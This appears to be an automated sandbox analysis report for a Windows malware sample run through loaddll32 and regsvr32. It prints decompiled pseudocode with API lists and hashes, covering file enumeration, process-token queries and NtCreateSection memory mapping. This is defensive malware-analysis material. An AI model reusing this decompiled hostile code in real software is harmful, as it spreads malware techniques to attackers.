                                                  • API String ID: 2812548120-0
                                                  • Opcode ID: 67b6a716de1094384de1360adbc50c1816a1e839b6c4647109797558cb26f2b1
                                                  • Instruction ID: 739ee03aca8c03933b3bea2a8ed17a7803c940706981b76ecab8b8c55f9b498f
                                                  • Opcode Fuzzy Hash: 67b6a716de1094384de1360adbc50c1816a1e839b6c4647109797558cb26f2b1
                                                  • Instruction Fuzzy Hash: 30F03AB4104309AFD3105F22DD81D27BBACFB852E9B21993DF086A1501D633A81A9AB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 50%
                                                  			E00EC75E9(void** __esi) {
                                                  				char* _v0;
                                                  				intOrPtr _t4;
                                                  				intOrPtr _t6;
                                                  				void* _t8;
                                                  				intOrPtr _t11;
                                                  				void* _t12;
                                                  				void** _t14;
                                                  
                                                  				_t14 = __esi;
                                                  				_t4 =  *0xecd32c; // 0x30095b0
                                                  				__imp__(_t4 + 0x40);
                                                  				while(1) {
                                                  					_t6 =  *0xecd32c; // 0x30095b0
                                                  					_t1 = _t6 + 0x58; // 0x0
                                                  					if( *_t1 == 0) {
                                                  						break;
                                                  					}
                                                  					Sleep(0xa);
                                                  				}
                                                  				_t8 =  *_t14;
                                                  				if(_t8 != 0 && _t8 != 0xecd030) {
                                                  					HeapFree( *0xecd238, 0, _t8);
                                                  				}
                                                  				_t14[1] = E00EC94A9(_v0, _t14);
                                                  				_t11 =  *0xecd32c; // 0x30095b0
                                                  				_t12 = _t11 + 0x40;
                                                  				__imp__(_t12);
                                                  				return _t12;
                                                  			}











                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(03009570), ref: 00EC75F2
                                                  • Sleep.KERNEL32(0000000A,?,00EC23DE), ref: 00EC75FC
                                                  • HeapFree.KERNEL32(00000000,00000000,?,00EC23DE), ref: 00EC7624
                                                  • RtlLeaveCriticalSection.NTDLL(03009570), ref: 00EC7640
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: c4ac651324f03105b920b1245bb9c43248f796e47bed40794423f87c14bf3c75
                                                  • Instruction ID: 6264ea70b4fd14ad6ed984b18f2b01ed406d4b35b7dd5a6d21ced69a5f572f89
                                                  • Opcode Fuzzy Hash: c4ac651324f03105b920b1245bb9c43248f796e47bed40794423f87c14bf3c75
                                                  • Instruction Fuzzy Hash: 95F01770A08640DFD7108B6EDE4AF0577A8EB54340B108029F846F6261D663D80BCA26
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00EC970F() {
                                                  				void* _t1;
                                                  				intOrPtr _t5;
                                                  				void* _t6;
                                                  				void* _t7;
                                                  				void* _t11;
                                                  
                                                  				_t1 =  *0xecd26c; // 0x33c
                                                  				if(_t1 == 0) {
                                                  					L8:
                                                  					return 0;
                                                  				}
                                                  				SetEvent(_t1);
                                                  				_t11 = 0x7fffffff;
                                                  				while(1) {
                                                  					SleepEx(0x64, 1);
                                                  					_t5 =  *0xecd2b8; // 0x0
                                                  					if(_t5 == 0) {
                                                  						break;
                                                  					}
                                                  					_t11 = _t11 - 0x64;
                                                  					if(_t11 > 0) {
                                                  						continue;
                                                  					}
                                                  					break;
                                                  				}
                                                  				_t6 =  *0xecd26c; // 0x33c
                                                  				if(_t6 != 0) {
                                                  					CloseHandle(_t6);
                                                  				}
                                                  				_t7 =  *0xecd238; // 0x2c10000
                                                  				if(_t7 != 0) {
                                                  					HeapDestroy(_t7);
                                                  				}
                                                  				goto L8;
                                                  			}









                                                  APIs
                                                  • SetEvent.KERNEL32(0000033C,00000001,00EC8099), ref: 00EC971A
                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 00EC9729
                                                  • CloseHandle.KERNEL32(0000033C), ref: 00EC974A
                                                  • HeapDestroy.KERNEL32(02C10000), ref: 00EC975A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: CloseDestroyEventHandleHeapSleep
                                                  • String ID:
                                                  • API String ID: 4109453060-0
                                                  • Opcode ID: 50adc479e8ac933e704fa81e077513ed75dfdafd0baea89cce0311b2ab781301
                                                  • Instruction ID: 6d196a2fc94413c2fee6905a7e3f2a0169d25d12805a157988b466e8dfb28916
                                                  • Opcode Fuzzy Hash: 50adc479e8ac933e704fa81e077513ed75dfdafd0baea89cce0311b2ab781301
                                                  • Instruction Fuzzy Hash: 11F08C7071A300DFD720AF37AE8DF0A77ACAB00754B140234B809F32A1DA23D80BA650
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			E00ECA5D6() {
                                                  				void* _v0;
                                                  				void** _t3;
                                                  				void** _t5;
                                                  				void** _t7;
                                                  				void** _t8;
                                                  				void* _t10;
                                                  
                                                  				_t3 =  *0xecd32c; // 0x30095b0
                                                  				__imp__( &(_t3[0x10]));
                                                  				while(1) {
                                                  					_t5 =  *0xecd32c; // 0x30095b0
                                                  					_t1 =  &(_t5[0x16]); // 0x0
                                                  					if( *_t1 == 0) {
                                                  						break;
                                                  					}
                                                  					Sleep(0xa);
                                                  				}
                                                  				_t7 =  *0xecd32c; // 0x30095b0
                                                  				_t10 =  *_t7;
                                                  				if(_t10 != 0 && _t10 != 0xece836) {
                                                  					HeapFree( *0xecd238, 0, _t10);
                                                  					_t7 =  *0xecd32c; // 0x30095b0
                                                  				}
                                                  				 *_t7 = _v0;
                                                  				_t8 =  &(_t7[0x10]);
                                                  				__imp__(_t8);
                                                  				return _t8;
                                                  			}










                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(03009570), ref: 00ECA5DF
                                                  • Sleep.KERNEL32(0000000A,?,00EC23DE), ref: 00ECA5E9
                                                  • HeapFree.KERNEL32(00000000,?,?,00EC23DE), ref: 00ECA617
                                                  • RtlLeaveCriticalSection.NTDLL(03009570), ref: 00ECA62C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: 4dc1a364ec934bdea8ddfd2e6dfdebda08aaf0d27f349a46297d06df9aaf2808
                                                  • Instruction ID: 5155ef9b7d85b45d4191e2cdd8b8fafa04c333a60a99a5c7e4a599a9e59dd52f
                                                  • Opcode Fuzzy Hash: 4dc1a364ec934bdea8ddfd2e6dfdebda08aaf0d27f349a46297d06df9aaf2808
                                                  • Instruction Fuzzy Hash: 14F0D474A04240DFE7188B2ADD5AF1577A5EB48309B188039E806FB371C737EC0ACE26
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E00EC7F27(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                  				intOrPtr* _v8;
                                                  				void* _t17;
                                                  				intOrPtr* _t22;
                                                  				void* _t27;
                                                  				char* _t30;
                                                  				void* _t33;
                                                  				void* _t34;
                                                  				void* _t36;
                                                  				void* _t37;
                                                  				void* _t39;
                                                  				int _t42;
                                                  
                                                  				_t17 = __eax;
                                                  				_t37 = 0;
                                                  				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                  				_t2 = _t17 + 1; // 0x1
                                                  				_t28 = _t2;
                                                  				_t34 = E00EC2049(_t2);
                                                  				if(_t34 != 0) {
                                                  					_t30 = E00EC2049(_t28);
                                                  					if(_t30 == 0) {
                                                  						E00EC9039(_t34);
                                                  					} else {
                                                  						_t39 = _a4;
                                                  						_t22 = E00ECA911(_t39);
                                                  						_v8 = _t22;
                                                  						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                  							_a4 = _t39;
                                                  						} else {
                                                  							_t26 = _t22 + 2;
                                                  							_a4 = _t22 + 2;
                                                  							_t22 = E00ECA911(_t26);
                                                  							_v8 = _t22;
                                                  						}
                                                  						if(_t22 == 0) {
                                                  							__imp__(_t34, _a4);
                                                  							 *_t30 = 0x2f;
                                                  							 *((char*)(_t30 + 1)) = 0;
                                                  						} else {
                                                  							_t42 = _t22 - _a4;
                                                  							memcpy(_t34, _a4, _t42);
                                                  							 *((char*)(_t34 + _t42)) = 0;
                                                  							__imp__(_t30, _v8);
                                                  						}
                                                  						 *_a8 = _t34;
                                                  						_t37 = 1;
                                                  						 *_a12 = _t30;
                                                  					}
                                                  				}
                                                  				return _t37;
                                                  			}















                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,00EC15A4,?,?,?,?,00000102,00EC11DA,?,?,00000000), ref: 00EC7F33
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                    • Part of subcall function 00ECA911: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00EC7F61,00000000,00000001,00000001,?,?,00EC15A4,?,?,?,?,00000102), ref: 00ECA91F
                                                    • Part of subcall function 00ECA911: StrChrA.SHLWAPI(?,0000003F,?,?,00EC15A4,?,?,?,?,00000102,00EC11DA,?,?,00000000,00000000), ref: 00ECA929
                                                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00EC15A4,?,?,?,?,00000102,00EC11DA,?), ref: 00EC7F91
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00EC7FA1
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00EC7FAD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 3767559652-0
                                                  • Opcode ID: 4042b1d5e15390beb4592ffda8d7b0ec1868a9a35ba557b144fd79583673fced
                                                  • Instruction ID: 22233382615218b3f473b188af4bd7c342f65313b128b2c8c39c89937caf7ae8
                                                  • Opcode Fuzzy Hash: 4042b1d5e15390beb4592ffda8d7b0ec1868a9a35ba557b144fd79583673fced
                                                  • Instruction Fuzzy Hash: 84212332508245EFCB129FA5CD85FAE7FE8AF06344B15506DFD44AB201D632C9028BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlen.KERNEL32(030087FA,00000000,00000000,74ECC740,00ECA453,00000000), ref: 00EC3CD8
                                                  • lstrlen.KERNEL32(?), ref: 00EC3CE0
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • lstrcpy.KERNEL32(00000000,030087FA), ref: 00EC3CF4
                                                  • lstrcat.KERNEL32(00000000,?), ref: 00EC3CFF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                  • String ID:
                                                  • API String ID: 74227042-0
                                                  • Opcode ID: 4624fbe9f518762ce70fea4d454b5f6a439f9f4a26a29396ecad4eb507e8a342
                                                  • Instruction ID: 1bae5084aa35b95ab119dca0543fa87d92fbf259d2dde5686084167d83387422
                                                  • Opcode Fuzzy Hash: 4624fbe9f518762ce70fea4d454b5f6a439f9f4a26a29396ecad4eb507e8a342
                                                  • Instruction Fuzzy Hash: C7E09B335012209B47119BE65C48C5FBBADEF89711704443BFA04E3120C7268C06C7E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Executed Functions

                                                  Control-flow Graph

                                                  C-Code - Quality: 93%
                                                  			E00C812D4(signed char* __eax, intOrPtr* _a4) {
                                                  				signed int _v12;
                                                  				void* _v16;
                                                  				CHAR* _v20;
                                                  				struct _FILETIME _v28;
                                                  				void* _v32;
                                                  				void* _v36;
                                                  				char* _v40;
                                                  				signed int _v44;
                                                  				long _v344;
                                                  				struct _WIN32_FIND_DATAA _v368;
                                                  				signed int _t72;
                                                  				void* _t74;
                                                  				signed int _t76;
                                                  				void* _t78;
                                                  				intOrPtr _t81;
                                                  				CHAR* _t83;
                                                  				void* _t85;
                                                  				signed char _t89;
                                                  				signed char _t91;
                                                  				intOrPtr _t93;
                                                  				void* _t96;
                                                  				long _t99;
                                                  				int _t101;
                                                  				signed int _t109;
                                                  				char* _t111;
                                                  				void* _t113;
                                                  				int _t119;
                                                  				char _t128;
                                                  				void* _t134;
                                                  				signed int _t136;
                                                  				char* _t139;
                                                  				signed int _t140;
                                                  				char* _t141;
                                                  				char* _t146;
                                                  				signed char* _t148;
                                                  				int _t151;
                                                  				void* _t152;
                                                  				void* _t153;
                                                  				void* _t154;
                                                  				void* _t165;
                                                  
                                                  				_v12 = _v12 & 0x00000000;
                                                  				_t148 = __eax;
                                                  				_t72 =  *0xc8d278; // 0x63699bc3
                                                  				_t74 = RtlAllocateHeap( *0xc8d238, 0, _t72 ^ 0x63699ac7);
                                                  				_v20 = _t74;
                                                  				if(_t74 == 0) {
                                                  					L36:
                                                  					return _v12;
                                                  				}
                                                  				_t76 =  *0xc8d278; // 0x63699bc3
                                                  				_t78 = RtlAllocateHeap( *0xc8d238, 0, _t76 ^ 0x63699bce);
                                                  				_t146 = 0;
                                                  				_v36 = _t78;
                                                  				if(_t78 == 0) {
                                                  					L35:
                                                  					HeapFree( *0xc8d238, _t146, _v20);
                                                  					goto L36;
                                                  				}
                                                  				_t136 =  *0xc8d278; // 0x63699bc3
                                                  				memset(_t78, 0, _t136 ^ 0x63699bce);
                                                  				_t81 =  *0xc8d27c; // 0x41a5a8
                                                  				_t154 = _t153 + 0xc;
                                                  				_t5 = _t81 + 0xc8e7f2; // 0x73797325
                                                  				_t83 = E00C895B1(_t5);
                                                  				_v20 = _t83;
                                                  				if(_t83 == 0) {
                                                  					L34:
                                                  					HeapFree( *0xc8d238, _t146, _v36);
                                                  					goto L35;
                                                  				}
                                                  				_t134 = 0xffffffffffffffff;
                                                  				_v28.dwLowDateTime = 0x63699bce;
                                                  				_v28.dwHighDateTime = 0x63699bce;
                                                  				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                  				_v32 = _t85;
                                                  				if(_t85 != 0x63699bce) {
                                                  					GetFileTime(_t85,  &_v28, 0, 0);
                                                  					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                                  					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                                  					FindCloseChangeNotification(_v32); // executed
                                                  				}
                                                  				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                                  				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                                  				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                                  				 *_t148 = _t91;
                                                  				_v32 = _t91 & 0x000000ff;
                                                  				_t93 =  *0xc8d27c; // 0x41a5a8
                                                  				_t16 = _t93 + 0xc8e813; // 0x642e2a5c
                                                  				_v40 = _t146;
                                                  				_v44 = _t89 & 0x000000ff;
                                                  				__imp__(_v20, _t16);
                                                  				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                                  				_v16 = _t96;
                                                  				if(_t96 == _t134) {
                                                  					_t146 = 0;
                                                  					goto L34;
                                                  				}
                                                  				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                  				while(_t99 > 0) {
                                                  					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                                  					if(_t101 == 0) {
                                                  						FindClose(_v16);
                                                  						_v16 = FindFirstFileA(_v20,  &_v368);
                                                  						_v28.dwHighDateTime = _v344;
                                                  						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                                  					}
                                                  					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                  				}
                                                  				_v12 = _v12 & 0x00000000;
                                                  				while(1) {
                                                  					_t109 = _v44;
                                                  					if(_v12 <= _t109) {
                                                  						goto L15;
                                                  					}
                                                  					_t140 = _v12;
                                                  					if(_t140 > _v32) {
                                                  						_t141 = _v36;
                                                  						 *_a4 = _t141;
                                                  						while(1) {
                                                  							_t128 =  *_t141;
                                                  							if(_t128 == 0) {
                                                  								break;
                                                  							}
                                                  							if(_t128 < 0x30) {
                                                  								 *_t141 = _t128 + 0x20;
                                                  							}
                                                  							_t141 = _t141 + 1;
                                                  						}
                                                  						_v12 = 1;
                                                  						FindClose(_v16); // executed
                                                  						_t146 = 0;
                                                  						goto L35;
                                                  					}
                                                  					_t165 = _t140 - _t109;
                                                  					L15:
                                                  					if(_t165 == 0 || _v12 == _v32) {
                                                  						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                                  						_t139 = _v40;
                                                  						_t151 = _t111 -  &(_v368.cFileName);
                                                  						_t113 = 0;
                                                  						if(_t139 != 0) {
                                                  							_t48 = _t151 - 4; // -4
                                                  							_t113 = _t48;
                                                  							if(_t113 > _t151) {
                                                  								_t113 = 0;
                                                  							}
                                                  						}
                                                  						if(_t151 > 4) {
                                                  							_t151 = 4;
                                                  						}
                                                  						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                                  						_t154 = _t154 + 0xc;
                                                  						_v40 =  &(_v40[_t151]);
                                                  					}
                                                  					do {
                                                  						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                                  						if(_t119 == 0) {
                                                  							FindClose(_v16);
                                                  							_v16 = FindFirstFileA(_v20,  &_v368);
                                                  						}
                                                  					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                                  					_v12 = _v12 + 1;
                                                  				}
                                                  			}

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 00C812FF
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00C81321
                                                  • memset.NTDLL ref: 00C8133B
                                                    • Part of subcall function 00C895B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00C823E9,63699BCE,00C81354,73797325), ref: 00C895C2
                                                    • Part of subcall function 00C895B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00C895DC
                                                  • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00C81379
                                                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00C8138D
                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00C813A4
                                                  • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00C813B0
                                                  • lstrcat.KERNEL32(?,642E2A5C), ref: 00C813F1
                                                  • FindFirstFileA.KERNELBASE(?,?), ref: 00C81407
                                                  • CompareFileTime.KERNEL32(?,?), ref: 00C81425
                                                  • FindNextFileA.KERNELBASE(00C896C1,?), ref: 00C81439
                                                  • FindClose.KERNEL32(00C896C1), ref: 00C81446
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00C81452
                                                  • CompareFileTime.KERNEL32(?,?), ref: 00C81474
                                                  • StrChrA.SHLWAPI(?,0000002E), ref: 00C814A7
                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 00C814E0
                                                  • FindNextFileA.KERNELBASE(00C896C1,?), ref: 00C814F5
                                                  • FindClose.KERNEL32(00C896C1), ref: 00C81502
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00C8150E
                                                  • CompareFileTime.KERNEL32(?,?), ref: 00C8151E
                                                  • FindClose.KERNELBASE(00C896C1), ref: 00C81553
                                                  • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 00C81565
                                                  • HeapFree.KERNEL32(00000000,?), ref: 00C81575
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                  • String ID:
                                                  • API String ID: 2944988578-0
                                                  • Opcode ID: 125b43cf4d755500b70c3ac6863881fff7960a56f92fadfbcbc25090703d9106
                                                  • Instruction ID: 2a989fde1dc93f4aca6af11d2dac2dcadf0f2cdc086cd9b3d6d540d3d4be65fd
                                                  • Opcode Fuzzy Hash: 125b43cf4d755500b70c3ac6863881fff7960a56f92fadfbcbc25090703d9106
                                                  • Instruction Fuzzy Hash: 6E8148B1900109EFDF11AFA5DC84BEEBBF9FB88344F14416AE516E6260D7309A45CB68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 38%
                                                  			E00C883B7(char _a4, void* _a8) {
                                                  				void* _v8;
                                                  				void* _v12;
                                                  				char _v16;
                                                  				void* _v20;
                                                  				char _v24;
                                                  				char _v28;
                                                  				char _v32;
                                                  				char _v36;
                                                  				char _v40;
                                                  				void* _v44;
                                                  				void** _t33;
                                                  				void* _t40;
                                                  				void* _t43;
                                                  				void** _t44;
                                                  				intOrPtr* _t47;
                                                  				char _t48;
                                                  
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_v20 = _a4;
                                                  				_t48 = 0;
                                                  				_v16 = 0;
                                                  				_a4 = 0;
                                                  				_v44 = 0x18;
                                                  				_v40 = 0;
                                                  				_v32 = 0;
                                                  				_v36 = 0;
                                                  				_v28 = 0;
                                                  				_v24 = 0;
                                                  				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                  					_t33 =  &_v8;
                                                  					__imp__(_v12, 8, _t33);
                                                  					if(_t33 >= 0) {
                                                  						_t47 = __imp__;
                                                  						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                  						_t44 = E00C82049(_a4);
                                                  						if(_t44 != 0) {
                                                  							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                  							if(_t40 >= 0) {
                                                  								memcpy(_a8,  *_t44, 0x1c);
                                                  								_t48 = 1;
                                                  							}
                                                  							E00C89039(_t44);
                                                  						}
                                                  						NtClose(_v8); // executed
                                                  					}
                                                  					NtClose(_v12);
                                                  				}
                                                  				return _t48;
                                                  			}
                                                  0x00c883c4
                                                  0x00c883c5
                                                  0x00c883c6
                                                  0x00c883c7
                                                  0x00c883c8
                                                  0x00c883cc
                                                  0x00c883d3
                                                  0x00c883e2
                                                  0x00c883e5
                                                  0x00c883e8
                                                  0x00c883ef
                                                  0x00c883f2
                                                  0x00c883f5
                                                  0x00c883f8
                                                  0x00c883fb
                                                  0x00c88406
                                                  0x00c88408
                                                  0x00c88411
                                                  0x00c88419
                                                  0x00c8841b
                                                  0x00c8842d
                                                  0x00c88437
                                                  0x00c8843b
                                                  0x00c8844a
                                                  0x00c8844e
                                                  0x00c88457
                                                  0x00c8845f
                                                  0x00c8845f
                                                  0x00c88461
                                                  0x00c88461
                                                  0x00c88469
                                                  0x00c8846f
                                                  0x00c88473
                                                  0x00c88473
                                                  0x00c8847e

                                                  APIs
                                                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00C883FE
                                                  • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00C88411
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00C8842D
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00C8844A
                                                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00C88457
                                                  • NtClose.NTDLL(?), ref: 00C88469
                                                  • NtClose.NTDLL(00000000), ref: 00C88473
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                  • String ID:
                                                  • API String ID: 2575439697-0
                                                  • Opcode ID: 72225f7e7ac267e58908060b0dbf89717c6efb2de4e36b0bc09aadbad793539e
                                                  • Instruction ID: 80bc1a7aa6187faaed65e868165c501fc58fbd0cbf22c7402e971a7676d61c3e
                                                  • Opcode Fuzzy Hash: 72225f7e7ac267e58908060b0dbf89717c6efb2de4e36b0bc09aadbad793539e
                                                  • Instruction Fuzzy Hash: 8C2112B2A0021DFBDB01AF95CC85ADEBFBDEF08744F104022F900E6121D7B19A44ABA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 72%
                                                  			E005E1EB5(intOrPtr* __eax, void** _a4) {
                                                  				int _v12;
                                                  				void* _v16;
                                                  				void* _v20;
                                                  				void* _v24;
                                                  				int _v28;
                                                  				int _v32;
                                                  				intOrPtr _v36;
                                                  				int _v40;
                                                  				int _v44;
                                                  				void* _v48;
                                                  				void* __esi;
                                                  				long _t34;
                                                  				void* _t39;
                                                  				void* _t47;
                                                  				intOrPtr* _t48;
                                                  
                                                  				_t48 = __eax;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_v24 =  *((intOrPtr*)(__eax + 4));
                                                  				_v16 = 0;
                                                  				_v12 = 0;
                                                  				_v48 = 0x18;
                                                  				_v44 = 0;
                                                  				_v36 = 0x40;
                                                  				_v40 = 0;
                                                  				_v32 = 0;
                                                  				_v28 = 0;
                                                  				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                  				if(_t34 < 0) {
                                                  					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                  				} else {
                                                  					 *_t48 = _v16;
                                                  					_t39 = E005E1D9F(_t48,  &_v12); // executed
                                                  					_t47 = _t39;
                                                  					if(_t47 != 0) {
                                                  						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                  					} else {
                                                  						memset(_v12, 0, _v24);
                                                  						 *_a4 = _v12;
                                                  					}
                                                  				}
                                                  				return _t47;
                                                  			}
                                                  0x005e1ebe
